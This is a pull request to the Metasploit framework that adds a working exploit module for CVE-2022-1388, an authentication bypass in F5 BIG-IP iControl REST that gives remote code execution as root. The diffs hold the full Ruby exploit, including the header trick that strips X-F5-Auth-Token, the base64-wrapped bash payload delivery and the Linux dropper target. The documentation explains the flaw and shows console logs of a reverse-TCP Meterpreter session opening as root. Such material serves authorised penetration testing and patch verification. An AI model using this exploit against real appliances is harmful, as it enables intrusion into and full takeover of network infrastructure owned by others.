### PR TITLE
Added module for f5 icontrol RCE (CVE-2022-1388)

### DIFF
--- a/documentation/modules/exploit/linux/http/f5_icontrol_rce.md
+++ b/documentation/modules/exploit/linux/http/f5_icontrol_rce.md
@@ -1,0 +1,90 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a authentication bypass vulnerability in the
+F5 iControl REST service to execute commands on an affected BIG-IP
+trough the endpoint `/mgmt/tm/util/bash`.
+This vulnerability is known as CVE-2022-1388.
+
+The vulnerability lies in The F5 has a custom Apache module `mod_auth_pam.so`
+that is responsible for some of the client authentication. It checks the request
+headers for the presence the `X-F5-Auth-Token`. If the header is found it
+goes onto eventually allow the request to be sent to the iControl REST service.
+Otherwise, the Authorization header is processed and the request is rejected
+if the credentials are invalid.
+
+It turns out that the check for the `X-F5-Auth-Token` header in `mod_auth_pam.so`
+is done before the Connection header is processed. This means that by adding
+`X-F5-Auth-Token` as a value for the Connection header, one can skip the
+basic authorization checks by `mod_auth_pam.so` and have the `X-F5-Auth-Token`
+header removed from our request before it gets passed to the iControl REST service
+and then access `/mgmt/tm/util/bash` to execute arbitrary system commands as root.
+
+CVE-2022-1388 affects the following F5 BIG-IP versions:
+
+* 16.1.x versions prior to 16.1.2.2
+* 15.1.x versions prior to 15.1.5.1
+* 14.1.x versions prior to 14.1.4.6
+* 13.1.x versions prior to 13.1.5
+* all 12.1.x and 11.6.x
+
+### Setup
+
+Import a vulnerable BIG-IP or BIG-IQ OVA, such as
+`BIGIP-16.0.1-0.0.3.ALL-vmware.ova`, into your desired hypervisor. Boot
+the virtual appliance, and it should be exploitable out of the box once
+it's up.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Unix command.
+
+### 1
+
+This uses a Linux dropper to execute code.
+
+## Options
+
+### USERNAME
+
+Set this to a valid admin username. Defaults to `admin`.
+
+### TARGETURI
+
+Set this to base path to the iControl installation. Defaults to `/`.
+
+## Scenarios
+
+### BIG-IP 12.1.5.3 (cmd/unix/generic)
+
+```
+msf6 exploit(linux/http/f5_icontrol_rce) > run
+
+[+] tmsh show sys version
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Executing Unix Command for cmd/unix/generic
+[*] Executing command: eval $(echo dG1zaCBzaG93IHN5cyB2ZXJzaW9u | base64 -d)
+[+] Successfully executed command
+
+Sys::Version
+Main Package
+  Product     BIG-IP
+  Version     12.1.5.3
+  Build       0.16.5
+  Edition     Engineering Hotfix
+  Date        Tue Mar  9 12:02:22 PST 2021
+
+Hotfix List
+ID625156-1
+
+
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/f5_icontrol_rce) > 
+```

--- a/documentation/modules/exploit/linux/http/f5_icontrol_rce.md
+++ b/documentation/modules/exploit/linux/http/f5_icontrol_rce.md
@@ -1,25 +1,36 @@
 ## Vulnerable Application
 
 ### Description
+This module exploits an authentication bypass vulnerability (CVE-2022-1388)
+in the F5 BIG-IP iControl REST service to gain access to the `admin` account,
+which is capable of executing commands through the `/mgmt/tm/util/bash`
+endpoint. Successful exploitation results in remote code execution as
+the `root` user.
 
-This module exploits a authentication bypass vulnerability in the
-F5 iControl REST service to execute commands on an affected BIG-IP
-trough the endpoint `/mgmt/tm/util/bash`.
-This vulnerability is known as CVE-2022-1388.
+The F5 BIG-IP management interface is made up of two different web servers:
+a reverse proxy that validates HTTP Basic authorization using `mod_auth_pam.so`,
+and a back end that validates the `X-F5-Auth-Token` header using
+`AuthTokenWorker.java`. If the reverse proxy sees an `X-F5-Auth-Token` header,
+it sends the full request to the back end for validation; if the back end
+sees a request *without* an `X-F5-Auth-Token` header, it assumes it has
+already been validated by the reverse proxy and uses the username from
+the `Authorization` header without validating the password a second time.
 
-The vulnerability lies in The F5 has a custom Apache module `mod_auth_pam.so`
-that is responsible for some of the client authentication. It checks the request
-headers for the presence the `X-F5-Auth-Token`. If the header is found it
-goes onto eventually allow the request to be sent to the iControl REST service.
-Otherwise, the Authorization header is processed and the request is rejected
-if the credentials are invalid.
+The issue fixed in CVE-2022-1388 is that the `Connection` header,
+processed by the reverse proxy, can *remove* the `X-F5-Auth-Token` header
+after the reverse proxy sees the request, but before it's forwarded to
+the back end. That means that the reverse proxy will think the back end
+is handling the authorization (since it saw the appropriate header), but
+the back end thinks the reverse proxy handled it (because the header gets
+removed) and permits the request. This is contrary to the expected
+operation and means that whatever username was passed in the `Authorization`
+field will be trusted as if the front end had validated it. This will
+result in the attacker bypassing authorization checks and gaining
+access to `admin`.
 
-It turns out that the check for the `X-F5-Auth-Token` header in `mod_auth_pam.so`
-is done before the Connection header is processed. This means that by adding
-`X-F5-Auth-Token` as a value for the Connection header, one can skip the
-basic authorization checks by `mod_auth_pam.so` and have the `X-F5-Auth-Token`
-header removed from our request before it gets passed to the iControl REST service
-and then access `/mgmt/tm/util/bash` to execute arbitrary system commands as root.
+The iControl REST service has several ways to execute shell commands
+as an administrative user, but `mgmt/tm/util/bash` is purpose-built
+to execute `bash` commands which makes it a perfect target.
 
 CVE-2022-1388 affects the following F5 BIG-IP versions:
 
@@ -29,14 +40,14 @@ CVE-2022-1388 affects the following F5 BIG-IP versions:
 * 13.1.x versions prior to 13.1.5
 * all 12.1.x and 11.6.x
 
-Tested against BIG-IP 12.1.5.3 and 13.1.3.6.
+Tested against BIG-IP 12.1.5.3, 13.1.3.6, 13.1.4.1, and 16.1.2.1.
 
 ### Setup
 
 Import a vulnerable BIG-IP or BIG-IQ OVA, such as
-`BIGIP-16.0.1-0.0.3.ALL-vmware.ova`, into your desired hypervisor. Boot
-the virtual appliance, and it should be exploitable out of the box once
-it's up.
+`BIGIP-16.0.1-0.0.3.ALL-vmware.ova` from https://ipxpy.net/f5/f5-1-course-introduction/,
+into your desired hypervisor. Boot the virtual appliance, and
+it should be exploitable out of the box once it's up.
 
 ## Verification Steps
 
@@ -64,29 +75,61 @@ Set this to base path to the iControl installation. Defaults to `/`.
 
 ## Scenarios
 
-### BIG-IP 12.1.5.3 (cmd/unix/generic)
+### BIG-IP 16.1.2.1
 
 ```
-msf6 exploit(linux/http/f5_icontrol_rce) > run
+msf6 > use exploits/linux/http/f5_icontrol_rce
+[*] Using configured payload cmd/unix/reverse_python_ssl
+msf6 exploit(linux/http/f5_icontrol_rce) > set PAYLOAD payload/cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/f5_icontrol_rce) > set RHOSTS 10.0.0.133
+RHOSTS => 10.0.0.133
+msf6 exploit(linux/http/f5_icontrol_rce) > set LHOST 10.0.0.123
+LHOST => 10.0.0.123
+msf6 exploit(linux/http/f5_icontrol_rce) > set RPORT 443
+RPORT => 443
+msf6 exploit(linux/http/f5_icontrol_rce) > show options
 
-[+] tmsh show sys version
-[!] AutoCheck is disabled, proceeding with exploitation
-[*] Executing Unix Command for cmd/unix/generic
-[*] Executing command: eval $(echo dG1zaCBzaG93IHN5cyB2ZXJzaW9u | base64 -d)
-[+] Successfully executed command
+Module options (exploit/linux/http/f5_icontrol_rce):
 
-Sys::Version
-Main Package
-  Product     BIG-IP
-  Version     12.1.5.3
-  Build       0.16.5
-  Edition     Engineering Hotfix
-  Date        Tue Mar  9 12:02:22 PST 2021
-
-Hotfix List
-ID625156-1
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   HttpPassword                   yes       iControl password
+   HttpUsername  admin            yes       iControl username
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        10.0.0.133       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT         443              yes       The target port (TCP)
+   SSL           true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI     /                yes       The base path to the iControl installation
+   VHOST                          no        HTTP server virtual host
 
 
-[*] Exploit completed, but no session was created.
-msf6 exploit(linux/http/f5_icontrol_rce) > 
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.0.0.123       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/f5_icontrol_rce) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.123:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking 10.0.0.133:443
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] Sending stage (40132 bytes) to 10.0.0.133
+[*] Meterpreter session 1 opened (10.0.0.123:4444 -> 10.0.0.133:50372) at 2022-05-11 10:59:32 -0700
+[!] Command execution timed out
+
+meterpreter > getuid
+Server username: root
 ```

--- a/documentation/modules/exploit/linux/http/f5_icontrol_rce.md
+++ b/documentation/modules/exploit/linux/http/f5_icontrol_rce.md
@@ -29,6 +29,8 @@ CVE-2022-1388 affects the following F5 BIG-IP versions:
 * 13.1.x versions prior to 13.1.5
 * all 12.1.x and 11.6.x
 
+Tested against BIG-IP 12.1.5.3 and 13.1.3.6.
+
 ### Setup
 
 Import a vulnerable BIG-IP or BIG-IQ OVA, such as

--- a/modules/exploits/linux/http/f5_icontrol_rce.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rce.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -26,12 +27,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' => [
           'Heyder Andrade', # Metasploit module
           'alt3kx <alt3kx[at]protonmail.com>', # PoC
+          'James Horseman', # Technical Writeup
           'Ron Bowes' # Documentation of exploitation specifics
         ],
         'References' => [
           ['CVE', '2022-1388'],
           ['URL', 'https://support.f5.com/csp/article/K23605346'],
-          ['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/']
+          ['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/'], # Writeup
+          ['URL', 'https://github.com/alt3kx/CVE-2022-1388_PoC'] # PoC
         ],
         'License' => MSF_LICENSE,
         'DisclosureDate' => '2022-05-04', # Vendor advisory
@@ -81,7 +84,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        Opt::RPORT(443),
         OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
         OptString.new('HttpUsername', [true, 'iControl username', 'admin']),
         OptString.new('HttpPassword', [true, 'iControl password', ''])

--- a/modules/exploits/linux/http/f5_icontrol_rce.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rce.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-        'DefaultTarget' => 0,
+        'DefaultTarget' => 1, # Linux Dropper avoids some timeout issues that Unix Command payloads sometimes encounter.
         'DefaultOptions' => {
           'RPORT' => 443,
           'SSL' => true,

--- a/modules/exploits/linux/http/f5_icontrol_rce.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rce.rb
@@ -13,15 +13,20 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'F5 BIG-IP iControl REST authentication bypass',
+        'Name' => 'F5 BIG-IP iControl RCE via REST Authentication Bypass',
         'Description' => %q{
-          This module exploits a authentication bypass vulnerability
-          in the F5 iControl REST service to execute commands on an
-          affected BIG-IP trough the endpoint `/mgmt/tm/util/bash`.
+          This module exploits an authentication bypass vulnerability
+          in the F5 BIG-IP iControl REST service to gain access to the
+          admin account, which is capable of executing commands
+          through the /mgmt/tm/util/bash endpoint.
+
+          Successful exploitation results in remote code execution
+          as the root user.
         },
         'Author' => [
           'Heyder Andrade', # Metasploit module
-          'alt3kx <alt3kx[at]protonmail.com>' # PoC
+          'alt3kx <alt3kx[at]protonmail.com>', # PoC
+          'Ron Bowes' # Documentation of exploitation specifics
         ],
         'References' => [
           ['CVE', '2022-1388'],
@@ -76,6 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
+        Opt::RPORT(443),
         OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
         OptString.new('HttpUsername', [true, 'iControl username', 'admin']),
         OptString.new('HttpPassword', [true, 'iControl password', ''])

--- a/modules/exploits/linux/http/f5_icontrol_rce.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rce.rb
@@ -76,7 +76,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
-        OptString.new('USERNAME', [true, 'Valid admin username', 'admin']),
+        OptString.new('HttpUsername', [true, 'iControl username', 'admin']),
+        OptString.new('HttpPassword', [true, 'iControl password', ''])
       ]
     )
     register_advanced_options([
@@ -85,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
+    print_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),
       'method' => 'GET'
@@ -95,7 +96,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
     body = res.get_json_document
 
-    return CheckCode::Appears if body.key?('message') && body['kind'] == ':resterrorresponse'
+    return CheckCode::Safe unless body.key?('message') && body['kind'] == ':resterrorresponse'
+
+    signature = Rex::Text.rand_text_alpha(13)
+    stub = "echo #{signature}"
+    res = send_command(stub)
+    return CheckCode::Safe unless res&.code == 200
+
+    body = res.get_json_document
+
+    return CheckCode::Safe unless body['kind'] == 'tm:util:bash:runstate'
+
+    return CheckCode::Vulnerable if body['commandResult'].chomp == signature
 
     CheckCode::Safe
   end
@@ -112,26 +124,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    bash_cmd = "eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)"
+    vprint_status("Executing command: #{cmd}")
 
-    print_status("Executing command: #{bash_cmd}")
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),
-      'ctype' => 'application/json',
-      'headers' => {
-        'Host' => 'localhost',
-        'Authorization' => "Basic  #{Base64.strict_encode64(datastore['USERNAME'] + ':')}",
-        'Connection' => 'keep-alive, X-F5-Auth-Token',
-        'X-F5-Auth-Token' => Rex::Text.rand_text_alpha_lower(6)
-      },
-      'data' => {
-        'command' => 'run',
-        'utilCmdArgs' => "-c '#{bash_cmd}'"
-      }.to_json
-    }, datastore['CmdExecTimeout'])
-
+    res = send_command(cmd)
     unless res
       print_warning('Command execution timed out')
       return
@@ -148,5 +143,24 @@ class MetasploitModule < Msf::Exploit::Remote
     return unless (cmd_result = json['commandResult'])
 
     vprint_line(cmd_result)
+  end
+
+  def send_command(cmd)
+    bash_cmd = "eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)"
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),
+      'ctype' => 'application/json',
+      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
+      'headers' => {
+        'Host' => 'localhost',
+        'Connection' => 'keep-alive, X-F5-Auth-Token',
+        'X-F5-Auth-Token' => Rex::Text.rand_text_alpha_lower(6)
+      },
+      'data' => {
+        'command' => 'run',
+        'utilCmdArgs' => "-c '#{bash_cmd}'"
+      }.to_json
+    }, datastore['CmdExecTimeout'])
   end
 end

--- a/modules/exploits/linux/http/f5_icontrol_rce.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rce.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/']
         ],
         'License' => MSF_LICENSE,
-        'DisclosureDate' => '2022-04-05', # Vendor advisory
+        'DisclosureDate' => '2022-05-04', # Vendor advisory
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => true,
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
               }
             }
           ],
@@ -60,6 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultTarget' => 0,
         'DefaultOptions' => {
+          'RPORT' => 443,
           'SSL' => true
         },
         'Notes' => {

--- a/modules/exploits/linux/http/f5_icontrol_rce.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rce.rb
@@ -13,69 +13,140 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Undisclosed requests may bypass iControl REST authentication',
+        'Name' => 'F5 BIG-IP iControl REST authentication bypass',
         'Description' => %q{
-          On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1,
-          14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x
-          and 11.6.x versions, undisclosed requests may bypass iControl REST authentication.
+          This module exploits a authentication bypass vulnerability
+          in the F5 iControl REST service to execute commands on an
+          affected BIG-IP trough the endpoint `/mgmt/tm/util/bash`.
         },
-        'License' => MSF_LICENSE,
         'Author' => [
-          'Heyder Andrade' # Metasploit module
+          'Heyder Andrade', # Metasploit module
+          'alt3kx <alt3kx[at]protonmail.com>' # PoC
         ],
         'References' => [
           ['CVE', '2022-1388'],
-          ['URL', 'https://support.f5.com/csp/article/K23605346']
+          ['URL', 'https://support.f5.com/csp/article/K23605346'],
+          ['URL', 'https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/']
         ],
-        'Platform' => ['unix'],
-        'Arch' => ARCH_CMD,
-        'Targets' => [
-          ['F5 iControl', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' } }]
-        ],
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2022-04-05', # Vendor advisory
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => true,
-        'DisclosureDate' => '2022-05-05',
-        'DefaultTarget' => 0
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :bourne,
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION], # Only one concurrent session
+          'SideEffects' => [
+            IOC_IN_LOGS, # /var/log/restjavad.0.log (rotated)
+            ARTIFACTS_ON_DISK # CmdStager
+          ]
+        }
       )
     )
 
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
-        OptString.new('Authorization', [true, 'Username and Password to be sent in the Authorization header', 'admin:'])
+        OptString.new('USERNAME', [true, 'Valid admin username', 'admin']),
       ]
     )
+    register_advanced_options([
+      OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])
+    ])
   end
 
   def check
     print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
     res = send_request_cgi({
-      'uri' => normalize_uri('/mgmt/shared/authn/login'),
+      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/authn/login'),
       'method' => 'GET'
     })
 
-    return CheckCode::Unknown unless res
+    return CheckCode::Unknown unless res&.code == 401
 
-    body = JSON(res.body) if res && res.code == 401
+    body = res.get_json_document
 
-    Exploit::CheckCode::Appears if body.key?('message') && body['kind'] == ':resterrorresponse'
+    return CheckCode::Appears if body.key?('message') && body['kind'] == ':resterrorresponse'
+
+    CheckCode::Safe
   end
 
   def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    bash_cmd = "eval $(echo #{Rex::Text.encode_base64(cmd)} | base64 -d)"
+
+    print_status("Executing command: #{bash_cmd}")
+
     res = send_request_cgi({
-      'uri' => normalize_uri('/mgmt/tm/util/bash'),
-      'version' => '1.1',
       'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/mgmt/tm/util/bash'),
+      'ctype' => 'application/json',
       'headers' => {
-        'Authorization' => "Basic  #{Base64.strict_encode64(datastore['Authorization'])}",
+        'Host' => 'localhost',
+        'Authorization' => "Basic  #{Base64.strict_encode64(datastore['USERNAME'] + ':')}",
         'Connection' => 'keep-alive, X-F5-Auth-Token',
-        'X-F5-Auth-Token' => 0,
-        'Keep-Alive' => '300',
-        'Cache-Control' => 'max-age=0',
-        'Content-Type' => 'application/json'
+        'X-F5-Auth-Token' => Rex::Text.rand_text_alpha_lower(6)
       },
-      'data' => { command: 'run', utilCmdArgs: " -c '#{payload.encoded}' " }.to_json
-    })
-    fail_with(Failure::UnexpectedReply) unless res.code == 200
-    print_good JSON(res.body)['commandResult']
+      'data' => {
+        'command' => 'run',
+        'utilCmdArgs' => "-c '#{bash_cmd}'"
+      }.to_json
+    }, datastore['CmdExecTimeout'])
+
+    unless res
+      print_warning('Command execution timed out')
+      return
+    end
+
+    json = res.get_json_document
+
+    unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'
+      fail_with(Failure::PayloadFailed, 'Failed to execute command')
+    end
+
+    print_good('Successfully executed command')
+
+    return unless (cmd_result = json['commandResult'])
+
+    vprint_line(cmd_result)
   end
 end

--- a/modules/exploits/linux/http/f5_icontrol_rce.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rce.rb
@@ -69,7 +69,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'RPORT' => 443,
-          'SSL' => true
+          'SSL' => true,
+          'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.
+          'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],

--- a/modules/exploits/linux/http/f5_icontrol_rce.rb
+++ b/modules/exploits/linux/http/f5_icontrol_rce.rb
@@ -1,0 +1,81 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Undisclosed requests may bypass iControl REST authentication',
+        'Description' => %q{
+          On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1,
+          14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x
+          and 11.6.x versions, undisclosed requests may bypass iControl REST authentication.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Heyder Andrade' # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2022-1388'],
+          ['URL', 'https://support.f5.com/csp/article/K23605346']
+        ],
+        'Platform' => ['unix'],
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          ['F5 iControl', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' } }]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2022-05-05',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
+        OptString.new('Authorization', [true, 'Username and Password to be sent in the Authorization header', 'admin:'])
+      ]
+    )
+  end
+
+  def check
+    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
+    res = send_request_cgi({
+      'uri' => normalize_uri('/mgmt/shared/authn/login'),
+      'method' => 'GET'
+    })
+
+    return CheckCode::Unknown unless res
+
+    body = JSON(res.body) if res && res.code == 401
+
+    Exploit::CheckCode::Appears if body.key?('message') && body['kind'] == ':resterrorresponse'
+  end
+
+  def exploit
+    res = send_request_cgi({
+      'uri' => normalize_uri('/mgmt/tm/util/bash'),
+      'version' => '1.1',
+      'method' => 'POST',
+      'headers' => {
+        'Authorization' => "Basic  #{Base64.strict_encode64(datastore['Authorization'])}",
+        'Connection' => 'keep-alive, X-F5-Auth-Token',
+        'X-F5-Auth-Token' => 0,
+        'Keep-Alive' => '300',
+        'Cache-Control' => 'max-age=0',
+        'Content-Type' => 'application/json'
+      },
+      'data' => { command: 'run', utilCmdArgs: " -c '#{payload.encoded}' " }.to_json
+    })
+    fail_with(Failure::UnexpectedReply) unless res.code == 200
+    print_good JSON(res.body)['commandResult']
+  end
+end


### PR DESCRIPTION
Added module for f5 icontrol RCE (CVE-2022-1388)

```
msf6 exploit(linux/http/f5_icontrol_rce) > options 

Module options (exploit/linux/http/f5_icontrol_rce):

   Name           Current Setting      Required  Description
   ----           ---------------      --------  -----------
   Authorization  admin:               yes       Username and Password to be sent in the Authorization header
   Proxies        http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         192.168.111.222      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT          443                  yes       The target port (TCP)
   SSL            true                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                    yes       The base path to the iControl installation
   VHOST                               no        HTTP server virtual host


Payload options (cmd/unix/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   whoami           yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   F5 iControl


msf6 exploit(linux/http/f5_icontrol_rce) > run

[+] whoami
[!] AutoCheck is disabled, proceeding with exploitation
[+] root

[*] Exploit completed, but no session was created.
```
## Scenarios

### BIG-IP  13.1.3.6 (cmd/unix/generic)
```
msf6 exploit(linux/http/f5_icontrol_rce) > run

[+] tmsh show sys version
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking component version to 127.0.0.1:443
[+] The target appears to be vulnerable.
[*] Executing Unix Command for cmd/unix/generic
[*] Executing command: eval $(echo dG1zaCBzaG93IHN5cyB2ZXJzaW9u | base64 -d)
[+] Successfully executed command

Sys::Version
Main Package
  Product     BIG-IP
  Version     13.1.3.6
  Build       0.0.4
  Edition     Point Release 6
  Date        Fri Jan 29 02:32:44 PST 2021


[*] Exploit completed, but no session was created.
```

### TODO
- [x] Add documentation
- [x] Use other payloads 